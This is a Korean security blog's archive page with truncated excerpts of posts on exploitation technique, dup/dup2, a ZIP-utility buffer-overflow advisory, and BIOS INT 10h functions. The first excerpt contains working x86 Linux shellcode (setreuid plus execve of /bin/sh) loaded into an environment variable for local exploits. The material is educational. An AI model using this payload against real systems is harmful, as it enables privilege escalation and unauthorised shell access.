반응형

전체 글 805

쉘코드 주소값, ret값 위치, .dtors 위치 찾기

/* * http://sosal.tistory.com/ * made by so_Sal */ 쉘코드의 주소를 환경변수로 가져올 수 있습니다. localhost] $ export hkpco=`perl -e 'print "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'` int main( void ) { char *p = getenv("hkpco"); printf( "%p\n" , p ); } -쉘코드 출처 - http://hkpco.kr/ UnivShellcod..

Linux : dup과 dup2

/* * http://sosal.tistory.com/ * made by so_Sal */ 이 포스팅은 open, read, write 등의 시스템콜을 기본적으로 안다는 가정 하에 작성된 글입니다. 위 시스템콜에 대해서 모르신다면 :: LINK_ 1. dup 2. dup2 1.dup - 파일 식별자를 복제한다. #include // man page 참조 int dup( int fd ); (dup은 duplication의 약자겠죠?.. 아마.. ㅋㅋ) 새로운 파일 서술자를 반환하지만, 숫자만 다를 뿐 원래의 서술자, 복제된 서술자 모두 완벽히 같은 파일을 가리킨다. 실패 : -1 반환 (파라미터로 전달된 값이 fd가 아닐경우, 더이상 fd를 할당하지 못할경우) /* * fd1 파일 디스크립터에 open을 ..

국내 압축 유틸리티 ZIP 파일 포멧 핸들링 취약성

http://hkpco.kr/advisory/zip/ 압축 유틸리티가 ZIP 파일 포멧의 File name 필드를 파싱 및 핸들링하는 과정에서 버퍼 오버플로우 취약성이 존재합니다. 이러한 문제점은 해당 프로그램의 크래쉬(Crash) 또는 악의적인 코드의 실행과 같은 결과로 이어질 수 있습니다. 현재까지 확인되어진 취약한 유틸리티는 빵집 , 밤톨이 등입니다. 라는 개요로 시작하는 굉장한 해킹시연 자료입니다. Author - 박찬암(hkpco) E-Mail - chanam.park@hkpco.kr Website - http://hkpco.kr/ 발표일: 2010. 06. 24 멋지네요, 덕분에 빵집이 5년만에 신버젼으로 찾아왔습니다. ㅎㅎ

Stigmatized./ETC. 2010.06.24

Assembly INT 10 속성들 정리

00 : 비디오 모드 설정 AL : 표준 색상 텍스트 01 : 커서 크기(드래그 효과) CX start:end 02 : 커서 위치 설정 BH : 페이지 DX : 행:열 03 : 커서 상태 반환 BH : 페이지 05 : 활성 페이지 선택 AL : 페이지 번호 06 : 화면 스크롤 up AL : 선의 개수(전체 00) BH : 배경:전경 CX : 시작 DX: 끝 (24: 79 = 18:4F) 07 : 화면 스크롤 down - 06과 동일 08 : 커서에 위치한 문자 속성 읽기 BH : 페이지 번호 AL에 문자 전달 AH에 속성 전달 09 : 커서에 위치한 문자 AL : ASCII BL : 배경:전경 //뒤집으면 역상 BH : 페이지 번호 CX : 반복되는 문자들의 횟수 0A : 커서에 위치한 문자 디스플레이..

반응형